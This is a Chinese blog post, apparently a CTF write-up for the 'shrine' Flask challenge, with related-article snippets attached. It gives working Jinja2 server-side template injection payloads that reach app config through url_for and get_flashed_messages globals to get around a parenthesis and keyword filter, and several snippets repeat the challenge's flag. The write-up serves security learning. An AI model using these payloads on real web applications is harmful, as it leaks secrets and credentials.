攻防世界web进阶区shrine

最新推荐文章于 2024-12-12 20:43:00 发布
最新推荐文章于 2024-12-12 20:43:00 发布
阅读量615 收藏 1
点赞数 3
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gongjingege/article/details/107711286
版权
博客介绍了在攻防世界Web进阶区的Shrine挑战中,通过代码审计发现可能存在的模板注入漏洞。利用 SSTI (Server-Side Template Injection) 进行尝试,发现过滤了括号并禁用了某些函数。通过研究大佬的解决方法,使用 `url_for` 和 `get_flashed_messages` 内置函数绕过过滤,成功获取配置信息。博客提到了 Flask 框架的相关知识和利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开链接,查看源码

在这里插入图片描述
代码审计

看见了flask,考虑模板注入,@app.route后跟着路径,还有一部分过滤

试一下

/shrine/{{1+1}},回显为2,确实是ssti

app.config['FLAG'] = os.environ.pop('FLAG')

注册了一个config,flag应该就在这里面,本来可以直接查看{{config}},但后面代码存在过滤

def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

过滤了()括号,将config,self两个函数加入黑名单,并遍历为空
看了下大佬的wp,python还有一些内置函数,url_for和get_flashed_messages,我两个都做一下,查看config

1,payload:
/shrine/{{url_for.__globals__['current_app'].config}}
在这里插入图片描述
2,get_flashed_messages
返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。

payload:

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

在这里插入图片描述
知识点:flask框架模板注入ssti

参考文章:https://www.cnblogs.com/echoDetected/p/12905261.html

2020.7.31 公瑾

【网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 5702
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序中,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask 中,url_for 函数是定义在 Flask 的全局命名空间中的
攻防世界web解题[进阶](五)
weixin_46703850的博客
03-10 561
攻防世界web解题[进阶](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
攻防世界web高手进阶17(shrine
Tp-scan
12-03 230
攻防世界web高手进阶17(shrine) 首先打开题目场景是一串代码,就知道是个代码审计题型,得先看懂代码 Ctrl+U查看一下源代码 代码里面加亮的地方提醒我们有路径,可以尝试访问一下 再尝试追一下路径 猜测有模板注入 构造pyload /shrine/{{2*5}} 可以看到计算出了结果,验证有SSTI模板注入 重新回顾一下源代码 这里把()给替换了,把config和self加入了黑名单 从代码 app.config['FLAG'] = os.environ.pop('FLAG')
攻防世界web进阶shrine
qq_45756971的博客
07-22 397
点开题目所给链接:首先查看它的源代码:我们首先尝试一下注入,在/shrine/路径下注入{{1+1}}:发现果然可以,我们还会发现他把config和self加入了黑名单 我们用搜索writeup大法给出的payload为{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}} 即可得到flag flag{shrine_is_good_ssti} ...
攻防世界shrine
weixin_52268949的博客
02-28 610
shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s):
攻防世界-shrine
m0_49025459的博客
12-30 768
让用户提交 Python 代码并在服务器上执行,是一些 OJ、量化网站重要的服务,很多 CTF 也有类似的题。沙箱经常会禁用一些敏感的函数,例如 os,研究怎么逃逸、防护这类沙箱还是蛮有意思的。看到这个源码我头都大了,我直接偷懒去看别的师傅写的WP,师傅们说这个是沙箱逃逸,python沙箱逃逸的方法是 利用python对象之间的引用关系来调用被禁用的函数对象。这个界面很乱奥,我们访问网页源代码,我们就能看见我们需要审计的源码了。我们把python源码复制下来,进行分析。python沙箱逃逸总结。
攻防世界webshrine
2301_82091795的博客
12-12 913
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s //最后可以看 到"{{}}"双大括号标志代表是jinja类的模板,下面也有写到。blacklist = ['config', 'self'] //黑名单内有config和self。s = s.replace('(', '').replace(')', '') //这块在检测括号并替换成空格。
攻防世界--Web进阶--Shrine--flask模板注入--全局变量Current-app--沙盒逃逸
z2560088的博客
10-11 2029
查看项目源码 代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def saf...
攻防世界Web进阶3(4分5分题)
chuxuezheerer的博客
02-19 1475
一.supersqli 二.FlatScience 三.easytornado 四.Cat 五.ics-04 六.shrine 七.ics-05
攻防世界----shrine
qq_44418229的博客
07-14 906
Flask的payload集合
shrine-攻防世界
szhangliwenya的博客
04-09 802
全局变量 url_for()函数和get_flashed_messages()函数,能够访问config对象,config 对象就是Flask的config对象,也就是 app.config 对象。在调试模式下,应用会提供额外的错误信息,并可以实时重载代码。从环境变量中取出名为 'FLAG' 的值,并将其存储在 Flask 应用的配置中。对于黑名单中的每个词,生成一个 Jinja2 模板代码片段,该片段将这个词设置为。导入 Flask 框架,Flask 是一个轻量级的 Web 应用框架。
攻防世界web进阶shrine详解
hxhxhxhxx的博客
07-30 3284
攻防世界web进阶shrine详解题目详解 题目 很明显给了一堆代码,我们将它整理一下 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read()\ @app.route('/shrine/') def shrine(shrine):
攻防世界--shrine-(详细操作)做题笔记
qq_43715020的博客
06-14 1215
攻防世界--shrine-笔(详细操作)做题笔记
攻防世界 shrine 详解
xmj818719的博客
03-29 2043
打开题目 整理源码 代码审计: 目标 config['FLAG'] 过滤了 config,self 这两个函数的过滤没看懂,总之好像也没过滤掉(应该是过滤了后面的变量),圆括号是彻底的被过滤掉了,URL编码都没用(刚开始想测试XSS来着) 做完后,拿编译器跑了一下带config的payload也没发现过滤 回归正题 2个@app.route 为路由 第一个是 / 使用URL/ 可访问index()也就是刚刚开始显示的源码 第二个...
【XCTF 攻防世界WEB 高手进阶 shrine(ssti,待补充)
weixin_45844670的博客
09-01 894
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
攻防世界-web shrine
m0_48108919的博客
02-12 2414
代码分析: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #flag的位置,需要查看的目标 @app.route('/') #路由:解析url,访问/路径时就执行index() def index(): return open(__file__).read() #读取文件 @app.route('/shrine/') def shrin...
攻防世界Webshrine
Light_inthe_eyes的博客
10-16 202
打开页面后,是一段代码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
攻防世界互相伤害!!!
最新发布
01-10
### 攻防世界的简介 攻防世界是一个在线平台,旨在通过模拟真实环境中的网络攻击与防御场景来提高参与者的实战技能[^1]。参与者可以在平台上练习各种技术手段,从而更好地理解信息安全和网络安全的核心原理。 ### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值